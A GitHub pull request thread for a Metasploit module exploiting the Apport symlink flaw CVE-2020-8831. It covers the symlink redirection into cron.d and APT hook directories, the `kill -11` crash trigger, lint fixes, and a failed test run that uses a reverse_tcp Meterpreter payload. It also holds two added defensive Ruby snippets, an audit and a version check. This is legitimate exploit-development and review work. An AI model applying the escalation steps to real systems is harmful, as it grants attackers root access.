
Add Apport Symlink Hijacking: CVE-2020-8831#20037

Open
gardnerapp wants to merge 36 commits into rapid7:master from gardnerapp:cve-2020-8831

Conversation

@gardnerapp
Contributor

This pull request is a draft for CVE-2020-8831. I originally came across this vulnerability while reading From Day Zero to Zero Day, which I highly recommend. The long story short is that certain versions of apport will follow symbolic links when writing crash dumps. This file will have a mask of 777 and be owned by root. In this module I used the command `ln -s /cron.d /var/lock/apport` so that a /etc/cron.d/lock crontab file would be created. This crontab should execute a payload every minute, which was located in the /tmp directory.

After scratching my head for several hours and combing through the log files, I found that the crontab would not execute because its file permissions were too excessive. We need to find another place for the symlink hijacking to occur. I have a few places in mind, namely /etc/init.d/ or ~/.bashrc, which would trigger the payload upon startup. I am submitting this because I am unsure of which route to go or if there are other places where the symlink hijacking should occur. Thank you!
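The two artefacts described above (a symlink where apport expects its lock directory, and a root-owned, world-writable file dropped into a privileged config directory such as /etc/cron.d, which cron then refuses to run) are what a defender would look for on a host. The following audit is an added example, not code from the PR or the module; the directory paths are parameters, and the demo builds a constructed tree under a temp dir rather than touching real system paths.

```ruby
require 'tmpdir'
require 'fileutils'

# True if the "other" write bit is set (the mode 0777 case described in the PR).
def world_writable?(stat)
  (stat.mode & 0o002) != 0
end

# Apport expects a real directory here; a symlink means its lock file was redirected.
def audit_lock_dir(lock_dir)
  return [] unless File.symlink?(lock_dir)
  ["#{lock_dir} is a symlink -> #{File.readlink(lock_dir)}"]
end

# Flags symlinks and privileged-owner, world-writable regular files in a
# config directory such as /etc/cron.d or /etc/apt/apt.conf.d.
def audit_config_dir(dir, privileged_uid: 0)
  return [] unless File.directory?(dir)
  Dir.each_child(dir).flat_map do |name|
    path = File.join(dir, name)
    st = File.lstat(path)
    if st.symlink?
      ["#{path} is a symlink (unexpected in #{dir})"]
    elsif st.file? && world_writable?(st) && st.uid == privileged_uid
      [format('%s is owned by uid %d with mode %04o', path, st.uid, st.mode & 0o7777)]
    else
      []
    end
  end
end

def audit(lock_dir:, config_dirs:, privileged_uid: 0)
  audit_lock_dir(lock_dir) +
    config_dirs.flat_map { |d| audit_config_dir(d, privileged_uid: privileged_uid) }
end

# Demo on a constructed tree; on a live host you would pass '/var/lock/apport',
# ['/etc/cron.d', '/etc/apt/apt.conf.d'] and privileged_uid: 0.
def demo
  Dir.mktmpdir do |root|
    cron_d = File.join(root, 'etc', 'cron.d')
    FileUtils.mkdir_p(cron_d)
    File.write(File.join(cron_d, 'lock'), "# constructed: world-writable crontab\n")
    File.chmod(0o777, File.join(cron_d, 'lock'))
    FileUtils.mkdir_p(File.join(root, 'var', 'lock'))
    File.symlink(cron_d, File.join(root, 'var', 'lock', 'apport'))
    audit(lock_dir: File.join(root, 'var', 'lock', 'apport'),
          config_dirs: [cron_d], privileged_uid: Process.uid)
  end
end

demo.each { |finding| puts finding } if $PROGRAM_NAME == __FILE__
```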

@gardnerapp gardnerapp marked this pull request as draft April 13, 2025 18:54
@gardnerapp
Contributor Author

I've accidentally committed pushes from another module. My apologies, I am unsure of the proper way to remove these.

@bcoles bcoles added the module label Apr 14, 2025
@bwatters-r7 bwatters-r7 self-assigned this Apr 15, 2025
@bwatters-r7
Contributor

> I've accidentally committed pushes from another module. My apologies, I am unsure of the proper way to remove these.

No problem; git is really awesome, but not always super intuitive.

It looks like the unwanted commits are all related to your previous game overlay module.
I can think of 3 ways to fix it (in order of what I would try first):

  1. Rebase and only bring in the changes for the new module
  2. Open a new branch current with master, check the file you want out to it, commit the changes, then force-push the new branch with just the new module to your existing branch
  3. Open a new branch that's current with master, then git merge --cherry-pick the changes you want.

Last, if you want, let me know and I am pretty sure I can fix it for you, but you might lose some commits. The only file you need here is modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb, right?

@gardnerapp
Contributor Author

Yes, I only want the files relevant to this module pushed. I just added the rebase; let me know if it is sufficient.

@bwatters-r7
Contributor

> Yes, I only want the files relevant to this module pushed. I just added the rebase; let me know if it is sufficient.

Looks good! Let us know when you'd like us to review it.

    )
    )
    register_options [
      OptString.new('WRITABLE_DIR', [true, 'A directory we can write to.', '/tmp']),
Contributor


For local exploit modules, this is usually registered as an advanced option:

    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]

Contributor Author

@gardnerapp gardnerapp left a comment


Finished review

@gardnerapp
Contributor Author

I accidentally committed a file for another exploit; please ignore.

@bwatters-r7
Contributor

Pertinent failing test log entries:

modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb - [ERROR] Incorrect disclosure date format
== modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb ==
W: 19: 19: [Correctable] Lint/DetectMetadataTrailingLeadingWhitespace: Metadata key or value has leading or trailing whitespace.

1 file inspected, 1 offense detected, 1 offense autocorrectable
modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb and verify all issues are resolved

@gardnerapp
Contributor Author

> Pertinent failing test log entries:
>
> modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb - [ERROR] Incorrect disclosure date format
> == modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb ==
> W: 19: 19: [Correctable] Lint/DetectMetadataTrailingLeadingWhitespace: Metadata key or value has leading or trailing whitespace.
>
> 1 file inspected, 1 offense detected, 1 offense autocorrectable
> modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb and verify all issues are resolved

Which log files are you checking? When I run rubocop this is the result:

 ~/metasploit-framework cve-2020-8831 $ rubocop -A modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
Inspecting 1 file
.

1 file inspected, no offenses detected

@gardnerapp
Contributor Author

gardnerapp commented Nov 26, 2025

I've checked the commit history of the Apport package and it looks like the vulnerable function check_lock exists in apport/data/apport as far back as 16 years ago. The check method currently returns CheckCode::Appears if the installed version is equal to 2.20.11. As I have verified that earlier versions of Apport are vulnerable to this, I would like to have the check method return CheckCode::Appears if the installed version is <= 2.20.11.

Additionally, when a normal user runs apt-get update or any other command which triggers the apt hook they'll notice that the command hangs. I've added notes to the module to account for this. Lastly, I've begun working on the documentation.
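The version comparison proposed above, as an added example that is not the module's own code: it reads the installed version from constructed `dpkg-query -s apport` output, strips the Debian epoch and revision so that only the upstream version is compared, and returns `:appears` for anything <= 2.20.11. The symbols `:appears`, `:safe` and `:unknown` stand in for Metasploit's CheckCode constants; nothing here queries a real package database.

```ruby
require 'rubygems' # provides Gem::Version

# Constructed sample of `dpkg-query -s apport` output, for illustration only.
SAMPLE_DPKG_OUTPUT = <<~OUT
  Package: apport
  Status: install ok installed
  Version: 2.20.11-0ubuntu27
OUT

# Highest upstream version treated as vulnerable, per the comment above.
MAX_VULNERABLE_VERSION = Gem::Version.new('2.20.11')

# Debian version strings look like [epoch:]upstream[-revision]. Gem::Version
# would read "-0ubuntu27" as a prerelease tag and sort it *below* 2.20.11,
# so the epoch and Debian revision are stripped before comparing.
def upstream_version(debian_version)
  v = debian_version.strip
  v = v.split(':', 2).last if v.include?(':') # drop epoch
  v = v.split('-', 2).first                    # drop Debian revision
  Gem::Version.new(v)
rescue ArgumentError
  nil # not a parseable version string
end

# Pulls the raw "Version:" value out of dpkg-query output, or nil if absent.
def installed_apport_version(dpkg_output)
  line = dpkg_output.lines.find { |l| l.start_with?('Version:') }
  line&.split(':', 2)&.last&.strip
end

# :appears  -> upstream version <= 2.20.11
# :safe     -> newer upstream version
# :unknown  -> version could not be determined
def apport_check_code(dpkg_output)
  raw = installed_apport_version(dpkg_output)
  return :unknown if raw.nil?
  version = upstream_version(raw)
  return :unknown if version.nil?
  version <= MAX_VULNERABLE_VERSION ? :appears : :safe
end

puts apport_check_code(SAMPLE_DPKG_OUTPUT) if $PROGRAM_NAME == __FILE__
```

Note that comparing the upstream version alone ignores Ubuntu's "-0ubuntuNN.M" revision, which is where distribution security backports are recorded, so a host running a patched revision of 2.20.11 would still be reported as `:appears`.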

@bwatters-r7
Contributor

[image]

When I look at the latest commit, it is marked as failing github checks (the red X). I can click on that 'x' and it tells me what was failing, and then I can click on the 'details' for that test, and it gives me the report log.

@gardnerapp
Contributor Author

> [image]
>
> When I look at the latest commit, it is marked as failing github checks (the red X). I can click on that 'x' and it tells me what was failing, and then I can click on the 'details' for that test, and it gives me the report log.

The review error says to run rubocop. When I do, there are no warnings or errors; here is what I get:

cve-2020-8831 $ rubocop -a modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb 
Inspecting 1 file

1 file inspected, no offenses detected

@bwatters-r7
Contributor

Some older dependencies were tripping me up on this branch and the file name change made rebasing a pain, so I just pulled the file into the master branch, and when I ran rubocop, it found the two lint issues:

[ruby-3.3.8@metasploit-framework](upstream-master) tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ git checkout upstream/pr/20037 -- modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
[ruby-3.3.8@metasploit-framework](upstream-master) tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ rubocop -a modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
Inspecting 1 file
W

Offenses:

modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb:19:19: W: [Corrected] Lint/DetectMetadataTrailingLeadingWhitespace: Metadata key or value has leading or trailing whitespace.
        'Name' => 'Apport Symlink Hijacking Privilege Escalation ',
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb:19:19: C: [Corrected] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
        'Name' => "Apport Symlink Hijacking Privilege Escalation",
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1 file inspected, 2 offenses detected, 2 offenses corrected
[ruby-3.3.8@metasploit-framework](upstream-master) tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ 

Odd that it is not showing up for you.

@gardnerapp
Contributor Author

Added a tidy, not sure if you saw!

@bwatters-r7
Contributor

@gardnerapp can you let me know where you got the vulnerable deb package?

@bwatters-r7 bwatters-r7 moved this from Todo to Waiting on Contributor in Metasploit Kanban Jan 7, 2026
@gardnerapp
Contributor Author

> @gardnerapp can you let me know where you got the vulnerable deb package?

Sorry, I just started a new job and have been busy wearing a suit, etc. I did this part a while ago, but I think this Ubuntu page should have the download you're looking for.

@bwatters-r7
Contributor

I finally got a chance to set this up: Ubuntu 22.04 x64 with the application that you sent.
Unfortunately, it fails for me?

msf exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > show options

Module options (exploit/linux/local/cve_2020_8831_apport_symlink_privesc):

   Name              Current Setting       Required  Description
   ----              ---------------       --------  -----------
   HOOKPATH          /etc/apt/apt.conf.d/  no        APT configuration directory.
   PAYLOAD_FILENAME  QejwbaaAOJp           yes       Name of payload
   SESSION           1                     yes       The session to run this module on
   WRITABLE_DIR      /home/msfuser         yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4545             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux_Binary



View the full module info with the info, or info -d command.

msf exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > run
[*] Started reverse TCP handler on 10.5.135.201:4545 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Apport appears to be vulnerable.
[+] The target appears to be vulnerable.
[*] Creating symlink...
[*] Triggering crash...
[-] Exploit aborted due to failure: not-found: exploit was unable to create /etc/apt/apt.conf.d/lock
[*] Exploit completed, but no session was created.
msf exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > 

@bwatters-r7
Contributor

It looks like the crash does crash, though....
[image]

gardnerapp and others added 3 commits February 16, 2026 11:15
@gardnerapp
Contributor Author

I've added some debugging statements to try and figure out what the file perms look like before and after the crash. Because the module runs `sleep 10s & kill -11 $!`, a crash is going to occur no matter what. In the past, issues have been encountered when some of the files are missing. I'll try to confirm that everything is working as expected on my system.

@bwatters-r7 bwatters-r7 moved this from Waiting on Contributor to In Progress in Metasploit Kanban Feb 24, 2026

Labels

module needs-docs needs-linting The module needs additional work to pass our automated linting rules

Projects

Status: In Progress


5 participants